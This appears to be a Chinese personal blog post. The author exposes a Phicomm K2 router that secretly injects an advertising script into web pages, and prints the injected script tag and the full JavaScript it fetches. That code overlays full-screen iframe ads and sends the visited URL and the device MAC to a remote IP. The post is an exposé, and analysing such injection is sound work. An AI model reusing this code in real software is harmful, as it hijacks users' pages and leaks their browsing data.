最近一段时间大概有两三次留意到某些不可能有广告的网站竟然弹出广告。今天得空了,一探究竟,意外发现我的路由器有猫腻,每天会不定时的,极低的频率给网页插入了一段代码:

<span class="html-tag">&lt;script <span class="html-attribute-name">src</span>=<a class="html-attribute-value html-resource-link" target="_blank"
href="http://222.73.156.145/587?MAC=747D240CC8C0">http://222.73.156.145/587?MAC=747D240CC8C0</a>&gt;</span><span class="html-tag">&lt;/script&gt;</span>

再访问地址http://222.73.156.145/587?MAC=747D240CC8C0, 得到js代码:

(function () {
var ip = 'http://222.73.156.145';
var pc = false;
var android = true;
var ios = true;
// 以下是需要手动替换的变量
var ad_customer = '587';
var mid = '561';
var deviceMac = '74:7D:24:0C:C8:C0';
loadExternResource({
scripts: [{tag: "script", url: ip + "/material/common/js/jquery-1.11.2.min.js"}],
callBack: function () {
//需要等待dom body load完成的时候再去加载
$(function(){
//console.log(document.readyState);
aa();
})
}
});
function loadExternResource(obj) {
var elem, links, scripts, callBack, hasReadyState;
var head = document.getElementsByTagName("head")[0];
var ObjOrg = {links: null, scripts: null, callBack: null};
for (var prop in obj) {
ObjOrg[prop] = obj[prop];
}
links = ObjOrg.links;
scripts = ObjOrg.scripts;
callBack = ObjOrg.callBack;
if (links != undefined) {
for (var i in links) {
elem = document.createElement("link");
elem.rel = "stylesheet";
elem.href = links[i].url;
head.appendChild(elem);
}
}
if (scripts != undefined) {
var load, loadHandle, loadCallBack;
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
hasReadyState = (elem.readyState != undefined);
loadCallBack = function (index) {
scripts[index].loadState = true;
for (var j in scripts) {
if (false == scripts[j].loadState) {
return;
}
}
callBack();
};
for (var i in scripts) {
scripts[i].loadState = false;
}
}
for (var i in scripts) {
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
if (hasReadyState) {
elem.onreadystatechange = (function (index) {
return function () {
if (this.readyState == "loaded" || this.readyState == "complete") {
this.onreadystatechange = null;
loadCallBack(index);
}
};
})(i);
} else {
elem.onload = (function (index) {
return function () {
loadCallBack(index);
};
})(i);
}
}
elem.src = scripts[i].url;
head.appendChild(elem);
}
}
}
function getPageCharset() {
var charSet = "";
var oType = getBrowser();
switch (oType) {
case "IE":
charSet = document.charset;
break;
case "FIREFOX":
charSet = document.characterSet;
break;
default:
charSet = document.charset;
break;
}
return charSet;
}
function getBrowser() {
var oType = "";
if (navigator.userAgent.indexOf("MSIE") != -1) {
oType = "IE";
} else if (navigator.userAgent.indexOf("Firefox") != -1) {
oType = "FIREFOX";
}
return oType;
}
function aa() {
/* $.get("http://" + ip + "/getIndex/"+ad_customer+"?MAC="+deviceMac, function(data){
ad_customer =data;
alert("material id"+ ad_customer);
});*/
//增加禁止域名判断
if(forbidHost()){
return false;
}
hostUrl = encodeURIComponent(top.window.location.href);
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf('Trident') > -1, //IE内核
presto: u.indexOf('Presto') > -1, //opera内核
webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), //是否为移动终端
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者QQHD浏览器
iPad: u.indexOf('iPad') > -1, //是否iPad
webApp: u.indexOf('Safari') == -1 //是否web应该程序,没有头部与底部
};
}()
}
if (isWeiXin() || isAPP()) {
} else if (browser.versions.android == true) { //只投Android
if(android){
str_html = '<iframe id="google_ads_frame2" name="google_ads_frame2" frameborder="0" src="' + ip
+ '/res/' + mid + '/mobile_index.html?pushupdateid=' + ad_customer + '&MAC=' + deviceMac + '&hostUrl=' + hostUrl + '"'
+ 'marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" style="position:fixed; top: 0px; display: block; z-index: 2147483647; width: 100%;"></iframe>';
}
} else if (browser.versions.ios == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
if(ios){
str_html = '<iframe id="google_ads_frame2" name="google_ads_frame2" frameborder="0" src="' + ip
+ '/res/' + mid + '/mobile_index.html?pushupdateid=' + ad_customer + '&MAC=' + deviceMac + '&hostUrl=' + hostUrl + '"'
+ 'marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" style="position:fixed; top: 0px; display: block; z-index: 2147483647; width: 100%;"></iframe>';
}
} else if (pc) {
str_html = '<iframe id="google_ads_frame2" name="google_ads_frame2" width="300px" ' +
'height="420px" frameborder="0" src="' + ip
+ '/res/' + mid + '/pc_index.html?pushupdateid=' + ad_customer + '&MAC=' + deviceMac + '&hostUrl=' + hostUrl + '"' +
' marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" style="position: fixed; display: block; z-index: 2147483647; height: 420px; overflow: visible; right: 5px; top: auto; bottom: 5px;"></iframe>';
} else {
}
$("body", window.top.document).append(str_html);
var str_html;
var docHeight;
docHeight = $(window).height();
if (browser.versions.android == true || browser.versions.android == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
$("#google_ads_frame2").height(docHeight);
}
}
function isWeiXin() {
var ua = window.navigator.userAgent.toLowerCase();
//console.log(ua);//mozilla/5.0 (iphone; cpu iphone os 9_1 like mac os x) applewebkit/601.1.46 (khtml, like gecko)version/9.0 mobile/13b143 safari/601.1
if (ua.match(/MicroMessenger/i) == 'micromessenger') {
return true;
} else {
return false;
}
}
function isAPP() {
var ua = window.navigator.userAgent.toLowerCase();
if (ua.indexOf("biliapp") >= 0) {
return true;
}
if (ua.indexOf("wifikey") >= 0) {
return true;
}
if (ua.indexOf("newsarticle") >= 0) {
return true;
}
if (ua.indexOf("peanutwi-fi") >= 0) {
return true;
}
if (ua.indexOf("phiwifi")>=0) {
return true;
}
if (ua.indexOf("changba") >= 0) {
return true;
}
if (ua.indexOf("momowebview") >= 0 || ua.indexOf("momokit") >= 0) {
return true;
} else {
return false;
}
}
//禁止显示广告的域名,后续增加多个时候可以使用数组
function forbidHost(){
var url = top.window.location.href;
var reg = /phicomm\.com/g;
var baiduReg = /m\.baidu\.com\/static/g;
if(reg.test(url) || baiduReg.test(url)){
return true;
}else{
return false;
}
}
})();

直接打电话给客服,客服一开始是把我当小白各种询问,最后很快的给了我一个官网未公开的固件版本,K2_V22.5.11.5.bin. 目前官网最新的版本是 V22.5.9.163,然而第二天发现,广告仍然存在。我真是太天真了。


回想了一下,我是在今年五月份买的斐讯路由器K2,之所以买这个路由器是因为当初网络很不稳定,100M带宽还经常断网,网速也慢,除了运营商的问题,我还怀疑小米双频路由器也脱离不了干系。于是在JD上搜了下,下单最热门的路由器,没想到就这么上了贼船,到了今天,我才有意识的关注斐讯。在知乎上搜索斐讯的名声,看到了如何看待斐讯K2路由器0元购的推广手段?,推测斐讯路由当初之所以最热门,肯定是跟这个推广活动有关,而活动过后京东依然给这个K2路由器保留着最高的热度,于是我就这么稀里糊涂的相信了. 同时,还搜到关于斐讯的暴力裁员事件,我顿时吐了一口老血,特此一记。

啥都不省心,改天自己刷openwrt!